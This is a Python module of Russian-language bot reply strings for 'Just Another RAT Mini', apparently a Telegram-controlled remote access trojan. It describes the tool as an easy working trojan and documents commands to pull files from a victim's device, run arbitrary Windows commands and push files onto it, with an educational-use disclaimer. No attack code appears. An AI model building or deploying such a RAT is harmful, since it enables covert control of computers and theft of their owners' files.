# -*- coding: utf-8 -*-
"""Все тексты ответов бота."""

ABOUT: str = """
💻 *Just Another RAT Mini*

Минимальный набор функций, необходимых для функционирования RAT-скрипта. Проект создан с целью показать, как легко можно создать рабочий троян, имея минимальные знания языка Python.

❗ Используйте утилиту исключительно в образовательных целях!

❗ Разработчик не несёт никакой ответственности за ваши действия!

💡 Используйте команду */help*, чтобы вывести список доступных команд.

🔗 Страница проекта на GitHub - [Just Another RAT Mini](https://github.com/Shuwiku/just_another_rat_mini).
""".strip()  # noqa: E501

ABOUT_DOC: str = """
*📄 Команда /start*:

Первое сообщение в диалоге с ботом. Выводит предупреждение и краткое описание проекта.
""".strip()  # noqa: E501

AUTHORIZATION_1: str = """
🔐 Для доступа к сервису вы должны пройти авторизацию.

Используйте команду `/auth пароль`.
""".strip()

AUTHORIZATION_2: str = """
🔓 Пароль принят.
""".strip()

AUTHORIZATION_3: str = """
❌ *Пароль не принят.*
""".strip()

AUTHORIZATION_4: str = """
🔑 Введите пароль:
""".strip()

AUTHORIZATION_DOC: str = """
*📄 Команда /auth*:

Обрабатывает запрос администратора на авторизацию.

*⚠️ Команда доступна только до авторизации!*
""".strip()

DOWNLOAD_1: str = """
📝 Введите название или путь к файлу:
""".strip()

DOWNLOAD_2: str = """
🕒 Файл отправляется. Это может занять некоторое время...
""".strip()

DOWNLOAD_3: str = """
📄 Запрошенный файл.
""".strip()

DOWNLOAD_DOC: str = """
*📄 Команда /download*:

Скачивает файл с устройства пользователя и отправляет в чат администратору. Если название файла не было указано сразу, запросит его ввод.

Например: `/download logs.log`.
""".strip()  # noqa: E501

DOWNLOAD_ERR_1: str = """
*❌ Ошибка.*

Файл по указанному пути не существует:
```
%s
```
""".strip()

DOWNLOAD_ERR_2: str = """
*❌ Ошибка.*

Время ожидания сервером передачи от пользователя истекло.
""".strip()

DOWNLOAD_ERR_3: str = """
*❌ Ошибка.*

Произошла непредвиденная ошибка. Подробнее:
```
%s
```
""".strip()

EXECUTE_1: str = """
📝 Введите команду:
""".strip()

EXECUTE_2: str = """
*💻 Результат выполнения команды*:
```
%s
```
""".strip()

EXECUTE_3: str = """
*❌ Команда ничего не вернула.*
""".strip()

EXECUTE_CD_1: str = """
*📁 Текущая директория:*
```
%s
```
""".strip()

EXECUTE_CD_2: str = """
*📁 Установлена директория:*
```
%s
```
""".strip()

EXECUTE_DOC: str = """
*📄 Команда /execute*:

Выполняет переданную команду и отправляет результат её выполения в терминале Windows. Если команда не была сразу передана, запросит ввод команды.

Например: `/execute dir`.
""".strip()  # noqa: E501

EXECUTE_ERR_1: str = """
*❌ Ошибка.*

Скорее всего такой команды не существует.

Подробнее:
```
%s
```
""".strip()

EXECUTE_ERR_2: str = """
*❌ Ошибка.*

Произошла неизвестная ошибка:
```
%s
```
""".strip()

EXECUTE_ERR_CD_1: str = """
*❌ Ошибка*

По указанному пути нет директории.
""".strip()

EXECUTE_ERR_CD_2: str = """
*❌ Ошибка*

По указанному пути находится файл, а не директория.
""".strip()

EXECUTE_ERR_CD_3: str = """
*❌ Ошибка*

К указанной директории нет доступа.
""".strip()

EXECUTE_ERR_CD_4: str = """
*❌ Ошибка*

Произошла неизвестная ошибка. Подробнее:
```
%s
```
""".strip()

HELP: str = """
*📃 Доступные команды утилиты*

*📄 /download*
Скачать файл с устройства пользователя.

*💻 /execute*
Выполнить переданную команду.

*⚙️ /help*
Вывести список команд бота.

*⚙️ /start*
Начать диалог с ботом.

*📄 /upload*
Загрузить файл на устройство пользователя.

Используйте аргумент `/?`, чтобы получить более подробную справку по команде. Например: `/help /?`
""".strip()  # noqa: E501

HELP_DOC: str = """
*📄 Команда /help*:

Выводит список всех команд бота и их краткое описание.
""".strip()

NOTIFY_ON_STARTUP: str = """
💻    *Just Another RAT Mini*

Утилита запущена.
""".strip()

UPLOAD_1: str = """
📄 Пришлите файл и укажите его название.
""".strip()

UPLOAD_2: str = """
🕒 Скачиваю файл. Это может занять некоторое время...
""".strip()

UPLOAD_3: str = """
✅ Файл успешно загружен и доступен по адресу:
```
%s
```
""".strip()

UPLOAD_DOC: str = """
UPLOAD DOC HERE
""".strip()

UPLOAD_ERR_1: str = """
*❌ Ошибка*

Файл не прикреплен!
""".strip()
